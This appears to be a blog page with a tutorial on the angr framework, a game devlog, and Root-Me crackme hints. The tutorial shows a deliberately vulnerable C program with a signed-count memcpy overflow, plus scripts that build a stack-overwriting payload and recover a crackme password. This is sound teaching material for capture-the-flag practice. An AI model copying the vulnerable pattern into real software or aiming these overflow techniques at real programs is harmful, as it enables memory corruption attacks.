Introduction to Angr

I always wanted to play around with a binary analysis framework, but most of the time I was turned off by how difficult it was to install and use one. Just recently I thought I’d give angr a try, and now I want to share my experience with you! I will present two scripts that solve two challenges; if you wish to dig deeper and learn angr, you should visit its official documentation.

angr is a Python framework for analyzing binaries. It combines static and dynamic symbolic (“concolic”) analysis, making it applicable to a variety of tasks.

For me the easiest way to install angr and get it working on the first try was to download Kali Linux, install it in VirtualBox (make sure the virtual disk has at least 12 GB of space) and run: pip install angr
From here you can set up your Python dev environment in Kali as you please.

For the first challenge we have the following source code:

//written by bla
#include <stdio.h>
#include <stdlib.h>   /* atoi(); this include was missing from the listing */
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
        int count = atoi(argv[1]);
        int buf[10];

        /* signed comparison: a negative count passes this check */
        if(count >= 10 )
                return 1;

        //printf("%lx\n", (size_t)(count * sizeof(int)));
        /* count * sizeof(int) is computed as an unsigned size_t, so a negative
           count wraps around to a small length that still overflows buf */
        memcpy(buf, argv[2], count * sizeof(int));
        if(count == 0x574f4c46) {
                //execl("/bin/sh", "sh" ,NULL);
                printf("WIN\n");   /* the post says the program displays WIN here */
        } else
                printf("Not today son\n");

        return 0;
}
Challenge source: level-7

The goal is to find two arguments to pass to the program so that the memcpy overflows buf into count and the program displays WIN. We could solve this by trial and error, with a debugger or with some computation, or we can make angr solve it for us with the following Python script.

import angr
import claripy

def resolve_win(state):
    # Returns True if the bytes "WIN" are found in the state's stdout
    return b"WIN" in state.posix.dumps(1)

if __name__ == '__main__':

    # Declare the project, loading the binary
    proj = angr.Project('./lab-13/0-tutorial/level07')

    # Two symbolic bitvectors for argv[1] and argv[2]:
    # argv[1] is at most 11 bytes (enough for an 11-character decimal count),
    # argv[2] is at most 44 bytes (the 40 bytes of buf plus the 4 bytes of count)
    arg1 = claripy.BVS('sym_arg1', 8 * 11)  # maximum 11 * 8 bits
    arg2 = claripy.BVS('sym_arg2', 8 * 44)  # maximum 44 * 8 bits

    # Construct an entry_state passing the two symbolic arguments
    st = proj.factory.entry_state(args=['./level07', arg1, arg2])
    # The st.libc.max_strtol_len tweak tells the atoi/strtol symbolic summary to
    # resolve strings that are at most 11 bytes long (the default is 10)
    st.libc.max_strtol_len = 11

    # Create what in angr terms is called a simulation manager
    pg = proj.factory.simgr(st)

    # Explore until a path is found whose state contains the string "WIN" in its
    # standard output (state.posix.dumps(1), where 1 is the file descriptor for
    # stdout); resolve_win is the predicate that checks this for each state.
    pg.explore(find=resolve_win)

    print("solution found")
    s = pg.found[0]
    print(s.posix.dumps(1))  # dump stdout

    # Evaluate and print the first argument
    print("Arg1: ", s.solver.eval(arg1, cast_to=bytes))
    # Evaluate and print the second argument
    print("Arg2: ", s.solver.eval(arg2, cast_to=bytes))

Running the script prints the solution for this binary. If the binary changed slightly (for example the value that count is compared against), we could still run the same script and get a solution.
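To see why the solver's answer works, here is the level07 logic modelled in plain Python (an added example, not code from the original post). It assumes a 32-bit build, so count * sizeof(int) is a 32-bit size_t that wraps, that buf[10] sits directly below count on the stack, and that the WIN branch prints "WIN"; the constants come from the listing above.

```python
import struct

# Constants derived from the level07 listing on this page
BUF_INTS = 10                 # int buf[10] -> 40 bytes on the stack
INT_SIZE = 4                  # sizeof(int); 32-bit build assumed
WIN_VALUE = 0x574F4C46        # value count must hold to reach the WIN branch
MASK32 = 0xFFFFFFFF

def to_int32(value):
    """Reinterpret a Python int as a two's-complement 32-bit C int."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value

def copy_length(count):
    """Length handed to memcpy: count * sizeof(int), wrapped to a 32-bit size_t."""
    return (count * INT_SIZE) & MASK32

def find_count(target_len):
    """A negative count that passes 'count >= 10' yet wraps to target_len bytes."""
    if target_len % INT_SIZE:
        raise ValueError("length must be a multiple of sizeof(int)")
    # count * 4 == target_len (mod 2^32)  <=>  count == target_len / 4 (mod 2^30)
    return to_int32(target_len // INT_SIZE - (1 << 30))

def simulate(arg1, arg2):
    """Mirror main(): return the program's stdout, or None when it exits early."""
    count = to_int32(int(arg1))          # atoi() on a decimal string
    if count >= 10:                      # signed comparison lets negatives through
        return None
    n = copy_length(count)
    # Modelled stack frame (assumption): buf[10] followed directly by count
    frame = bytearray(BUF_INTS * INT_SIZE + INT_SIZE)
    struct.pack_into("<i", frame, BUF_INTS * INT_SIZE, count)
    if n > len(frame):
        raise MemoryError("memcpy runs past the modelled frame (the binary would crash)")
    frame[:n] = arg2.ljust(n, b"\0")[:n]   # memcpy copies n bytes regardless of NULs
    count = struct.unpack_from("<i", frame, BUF_INTS * INT_SIZE)[0]
    return b"WIN\n" if count == WIN_VALUE else b"Not today son\n"

def build_args():
    """Construct argv[1] and argv[2] that reach the WIN branch."""
    n = BUF_INTS * INT_SIZE + INT_SIZE     # 44 bytes: fill buf, then overwrite count
    count = find_count(n)                  # -1073741813, 11 characters as a string
    payload = b"A" * (BUF_INTS * INT_SIZE) + struct.pack("<I", WIN_VALUE)
    return str(count).encode(), payload

if __name__ == "__main__":
    a1, a2 = build_args()
    print(a1, a2, simulate(a1, a2))
```

The 11-character count and the 44-byte second argument are exactly the sizes the symbolic script above reserves for arg1 and arg2.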

The next challenge is easier. The binary is called multiple-styles and it can be downloaded from here:

By looking at its disassembly output:

multiple-styles disassembly

We can see that the program does the following things:

  1. Calls read, which reads the ‘password’ from stdin into a buffer.
  2. Loads the string “myvnvsuowsxs}ynk” into a buffer.
  3. Loops through the buffer byte by byte, adds 10 to each byte (the instruction at 0x00400a27: add dword [rbp-0x54 {var_5c_2} {var_5c_1}], 0xa) and compares it with the previously loaded string.
  4. If they match, it jumps to 0x00400a6c and prints “you got it!”

At this point we could search for an online Caesar cipher tool, paste the string that got loaded and decipher it with an offset of -10, but we’re going to let angr recover the password for us.

import angr
import claripy

if __name__ == '__main__':
    proj = angr.Project("./multiple-styles", auto_load_libs=False)

    # Create a 160-bit (20-byte) symbolic bitvector named "password"
    password = claripy.BVS('password', 20*8)

    # Construct a blank_state at the address of main and feed password to stdin
    st = proj.factory.blank_state(addr=0x004009ae, stdin=password)

    # Create a simulation manager
    pg = proj.factory.simulation_manager(st)

    # Tell angr to look for 0x00400a6c, the starting address of the green block
    # that prints "you got it!", while avoiding the address 0x00400a40
    pg.explore(find=0x00400a6c, avoid=0x00400a40)

    print("solution found")
    # Grab the solution
    s = pg.found[0]

    # Print the contents of stdin (file descriptor 0)
    print("Flag: ", s.posix.dumps(0))

    # The password can also be read from the symbolic bitvector
    print("Pass: ", s.solver.eval(password, cast_to=bytes))

While writing the scripts I’ve used angr version ` Please consult Angr’s official documentation if you wish to learn more!

Thank you for reading! 😀


MAD: Game DevLog #4, Main Menu, Camera Shake and Enemies

Hello everyone!

Here’s what we did for our 4th devlog:

We’ve added a main menu to the game; it is interactive and works without any code at all. Thanks to Brackeys for making awesome tutorials; here’s the one we used for the menu:

After creating the main menu, we wanted to juice up the game a little, so we researched ways to shake the camera when a bomb explodes.

The first approach was naive and it didn’t work. I was taking the camera’s position and moving it randomly, which felt robotic. Luckily for us, Unity has a built-in Perlin noise generator for Cinemachine, the package we use for managing cameras.

The Perlin noise was developed by Ken Perlin and it is:

a technique used to produce natural appearing textures on computer generated surfaces for motion picture visual effects.

Unity also lets us tune the generator by modifying its amplitude and frequency parameters, which makes it very convenient to use.

Last but not least, we weren’t satisfied with the enemies; we still have some bugs with their behavior, but Andrei was there to fix them.

What I did instead was try to make some decent enemy sprites in Aseprite, since Cosmigo Pro Motion doesn’t work on my Mac :(.

Snow Enemy v1

Since I don’t have enough practice, my sprites don’t look that good; I tried to keep them as simple as possible and only used two key frames when animating them.

If you want to start making pixel art, there are a lot of free tutorials on the internet. Here are some to get you started:

Thanks for reading and have a nice day!

Root-Me Reversing: crackme_wtf hints

It’s been some time since I’ve done any reverse engineering, and today I completed a simple challenge on Root-Me. The filename of the challenge is crackme_wtf, and here are some hints to get you started:

  1. Determine the type of the FILEs.
  2. Don’t be afraid to patch and use a debugger.
  3. Try to eliminate the randomness: look for functions that deal with time, random numbers or the current process’s id.
  4. If the last hint doesn’t yield any results… is the required password really needed to reach the flag?

Thanks for reading and good luck!